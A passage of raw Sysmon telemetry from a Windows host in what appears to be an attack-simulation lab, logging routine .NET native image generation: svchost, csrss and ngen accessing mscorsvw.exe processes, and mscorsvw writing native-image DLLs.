b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:00.242{59A5CD1D-9244-6005-3704-00000000A301}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\fec-0\System.Drawing.Design.dll2021-01-18 13:51:00.242 10341000x80000000000000008505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9244-6005-3704-00000000A301}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.101{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9244-6005-3704-00000000A301}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.101{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9244-6005-3704-00000000A301}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.054{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9244-6005-3604-00000000A301}3664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.039{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9244-6005-3604-00000000A301}3664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:00.039{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9244-6005-3604-00000000A301}3664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:01.773{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9245-6005-3D04-00000000A301}4928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:01.757{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9245-6005-3D04-00000000A301}4928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:01.757{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9245-6005-3D04-00000000A301}4928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:01.554{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9245-6005-3C04-00000000A301}648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:01.539{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9245-6005-3C04-00000000A301}648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:01.539{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9245-6005-3C04-00000000A301}648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:01.429{59A5CD1D-9244-6005-3B04-00000000A301}1404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\57c-0\System.EnterpriseServices.dll2021-01-18 13:51:01.429 11241100x80000000000000008520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:01.414{59A5CD1D-9244-6005-3B04-00000000A301}1404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\57c-0\System.EnterpriseServices.Wrapper.dll2021-01-18 13:51:01.414 10341000x80000000000000008519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:01.007{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9244-6005-3B04-00000000A301}1404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:03.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9247-6005-4104-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:03.976{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9247-6005-4104-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:03.976{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9247-6005-4104-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:03.710{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9247-6005-4004-00000000A301}4508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:03.695{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9247-6005-4004-00000000A301}4508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:03.695{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9247-6005-4004-00000000A301}4508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:03.632{59A5CD1D-9247-6005-3F04-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1050-0\System.IdentityModel.Selectors.dll2021-01-18 13:51:03.632 10341000x80000000000000008534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:03.507{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9247-6005-3F04-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:03.492{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9247-6005-3F04-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:03.492{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9247-6005-3F04-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 